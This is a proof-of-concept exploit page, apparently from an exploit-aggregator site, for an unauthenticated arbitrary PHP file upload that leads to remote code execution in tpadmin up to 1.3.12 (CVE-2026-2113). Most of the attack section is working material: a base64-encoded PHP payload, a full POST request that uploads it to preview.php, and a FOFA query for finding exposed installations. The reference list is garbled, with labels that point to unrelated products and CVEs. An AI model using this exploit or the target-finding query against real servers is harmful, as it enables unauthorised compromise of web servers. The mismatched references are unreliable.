Share
## https://sploitus.com/exploit?id=PACKETSTORM:215265
# tpadmin-CVE-2026-2113-poc
    
    A proof-of-concept exploiting a Remote Code Execution with web server privileges via Arbitrary File Upload.
    
    # Vulnerability Description
    
    A critical Remote Code Execution vulnerability exists in H-ui.admin system's WebUploader preview component. The `<font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font>` file lacks proper authentication and file validation, allowing unauthenticated attackers to upload arbitrary PHP files directly to the web server. This results in immediate Remote Code Execution with web server privileges.
    
    # Affected Versions
    
    - tpadmin up to version 1.3.12
    
    # Poc (by sTy1H)
    
    1. Construct payload (Encode the dangerous statement in base64)
    ```bash
    printf "<? php phpinfo();?>" | base64
    PD9waHAgcGhwaW5mbygpOz8+
    ```
    
    2. Construct the POST request with our payload
    ```html
    POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 46
    
    data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
    ```
    3. Visit the returned url
    
    <img width="800" height="600" alt="image" src="https://github.com/user-attachments/assets/beaa331e-0553-4b71-b4bc-a38dcbd759e5" />
    
    # Into the wild
    
    FOFA:
    
    ```
    title='Tpadmin'
    ```
    
    # Impact
    
    An unauthenticated remote attacker can exploit an Arbitrary File Upload to gain an RCE with web server privileges.
    
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium
    
    # Remediation & Mitigation
    
    There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.
    
    # References
    
    - https://github.com/yuan1994/tpAdmin
    - [https://www.smartertools.com/smartermail/release-notes/current](https://www.cve.org/CVERecord?id=CVE-2026-2113))
    - [https://nvd.nist.gov/vuln/detail/CVE-2026-23760](https://github.com/sTy1H/CVE-Report/blob/main/Remote%20Code%20Execution%20Vulnerability%20in%20Tpadmin%20System.md)